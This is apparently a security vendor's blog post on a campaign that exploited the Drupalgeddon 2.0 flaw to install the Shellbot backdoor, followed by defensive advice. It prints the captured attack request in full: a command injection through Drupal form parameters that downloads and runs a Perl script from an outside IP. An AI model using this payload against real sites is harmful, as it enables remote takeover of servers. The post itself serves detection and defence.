IBM Security’s Managed Security Services (MSS) team monitors the enterprise threat landscape on an ongoing basis, detecting and mapping new threats as they emerge. In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.

This appears to be a financially motivated effort to mass-compromise websites. How can defenders keep websites and underlying systems safe in the face of these evolving threats?

What Is Drupal, and Why Is It a Target?

Like WordPress, Drupal is a content management system (CMS) that is used widely by people who create and maintain websites and applications for all sorts of purposes, both personal and business, private and public. Drupal is open source and, as such, is maintained by a community of users. This is also how its security and vulnerability patching is maintained.

CMSs that are used across a large number of websites are juicy targets for cybercriminals, who commonly automate their attacks in a one-size-fits-all type of operation. Those who target random websites aim to compromise as many as possible and consider the monetization options later.

To do that, malicious actors often pick a vulnerability and then probe for exploitable sites en masse. Those found unpatched or vulnerable for some other reason might fall under the attacker’s control, which could mean a complete compromise of that site. With this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.

ShellBot Attacks Open Backdoors With Drupalgeddon 2.0

In recent investigations into malicious activity targeting enterprises across the globe, our team detected an IP address that was repeatedly sending the same HTTP POST request:

IP Address Suspicious Request
31.204.80.133 /?q=user/password&name[#type]=markup&name[#markup]=cd /tmp;wget 64.15.78.216 /lip;perl;cd /tmp;curl -O 64.15.78.216 /lip;perl lip;rm -rf lip*&name[#post_render][]=passthru
Scroll to view full table

Further examination of these requests revealed additional sources of similar traffic from a number of command-and-control (C&C) servers, hosting servers that download a Perl script to launch the Shellbot malware and a payload naming pattern that started to paint the picture of a widespread cyberattack. Our team traced the beginning of this campaign to mid-August 2018.

Scan and Deploy

Scanning websites for vulnerable configurations, the attackers leveraged a critical remote code execution (RCE) vulnerability known as CVE-2018-7600, or Drupalgeddon 2.0, to eventually open a backdoor using the Shellbot malware. The scan also included a second vulnerability, CVE-2018-7602, another highly critical RCE flaw. Both these flaws have been patched, but vulnerabilities persists as users delay in patching and upgrading.

As we continued to look into the attack, vulnerable websites were scanned for the /user/register and /user/password pages in the installation phase as attackers tried to brute-force their way in with existing user access details discovered while attempting to “wget” the Perl script for Backdoor.Shellbot.

When successful, the script ran a shell command injection that was used to install the Perl-based bot. The Shellbot instance in our investigation connected to an Internet Relay Chat (IRC) channel and used it as a C&C hub to receive instructions from its controller. The bot contained multiple tools to perform distributed denial-of-service (DDoS) attacks and search for SQL injection weaknesses and other vulnerabilities, including privilege escalation to reach root level on the victimized system.

The vulnerabilities used in this campaign were leveraged in an automated way, allowing attackers to scan a large number of websites with minimal effort. Moreover, if successfully exploited, the flaw could lead to a potential compromise of the web application with the possibility of spilling over to the underlying operating system as well.

Shellbot Resurfaces

Shellbot itself is an old code that has been around since about 2005, used maliciously to remotely access and control compromised endpoints. Shellbot can open remote command line shells, perform denial-of-service attacks, run tasks and processes, download additional files per the attacker’s command, and change the endpoint’s settings, to name a few.

Shellbot may seem dated and simplistic, but it is in active use by several threat groups. In March 2017, in the heat of Apache Struts (CVE-2017-5638), ShellBot was packaged as the C&C with the PowerBot malware, which deployed cryptocurrency mining modules on infected devices. This combination allowed criminals to generate over $100k in illicit profits from their schemes.

Reviewing most of the Shellbot malware attacks we have detected in recent months, our team identified some variants with instructions to:

  • Terminate all running cryptocurrency mining activities before installing the attacker’s new cryptocurrency miner;
  • Host phishing campaigns;
  • Distribute phishing email spam;
  • Carry out various types of DDoS attacks; and
  • Exfiltrate data via a PHP module to a predetermined email address.

Attackers Bank on Old Vulnerabilities

It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications.

Here are some tips from our security specialists on how to mitigate the risk from existing vulnerabilities and those who use them to compromise web resources and assets:

  • Use updated protocols such as HTTPS and upgrade if need be.
  • Update CMSs to the most recent version and use all available patches.
  • Perform input validation checks on all web applications to ensure that shell commands cannot be executed by any end user. Validate on both client and server side to ensure that scripting and malicious code cannot run on the underlying server or database.
  • Attackers will try to brute-force credentials; make sure that passwords are strong, encrypted and salted. Use two-factor authentication (2FA) to foil automated attacks.

Want to know more? Find indicators of compromise (IoCs) and more technical details about this campaign on X-Force Exchange.

Uncover the Value of Digital Fraud Protection

More from Software Vulnerabilities

FYSA – Critical RCE Flaw in GNU-Linux Systems

2 min read - Summary The first of a series of blog posts has been published detailing a vulnerability in the Common Unix Printing System (CUPS), which purportedly allows attackers to gain remote access to UNIX-based systems. The vulnerability, which affects various UNIX-based operating systems, can be exploited by sending a specially crafted HTTP request to the CUPS service. Threat Topography Threat Type: Remote code execution vulnerability in CUPS service Industries Impacted: UNIX-based systems across various industries, including but not limited to, finance, healthcare,…

X-Force discovers new vulnerabilities in smart treadmill

7 min read - This research was made possible thanks to contributions from Joshua Merrill. Smart gym equipment is seeing rapid growth in the fitness industry, enabling users to follow customized workouts, stream entertainment on the built-in display, and conveniently track their progress. With the multitude of features available on these internet-connected machines, a group of researchers at IBM X-Force Red considered whether user data was secure and, more importantly, whether there was any risk to the physical safety of users. One of the most…

X-Force releases detection & response framework for managed file transfer software

5 min read - How AI can help defenders scale detection guidance for enterprise software tools If we look back at mass exploitation events that shook the security industry like Log4j, Atlassian, and Microsoft Exchange when these solutions were actively being exploited by attackers, the exploits may have been associated with a different CVE, but the detection and response guidance being released by the various security vendors had many similarities (e.g., Log4shell vs. Log4j2 vs. MOVEit vs. Spring4Shell vs. Microsoft Exchange vs. ProxyShell vs.…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today